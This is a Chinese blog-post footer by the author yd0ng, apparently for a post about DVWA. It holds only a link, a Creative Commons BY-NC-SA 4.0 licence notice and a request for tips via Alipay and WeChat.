本文作者： yd0ng
本文链接： https://yd0ng.github.io/2020/01/04/DVWA/
版权声明： 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处！

赏

谢谢您的打赏，大家一起加油喔~

支付宝

微信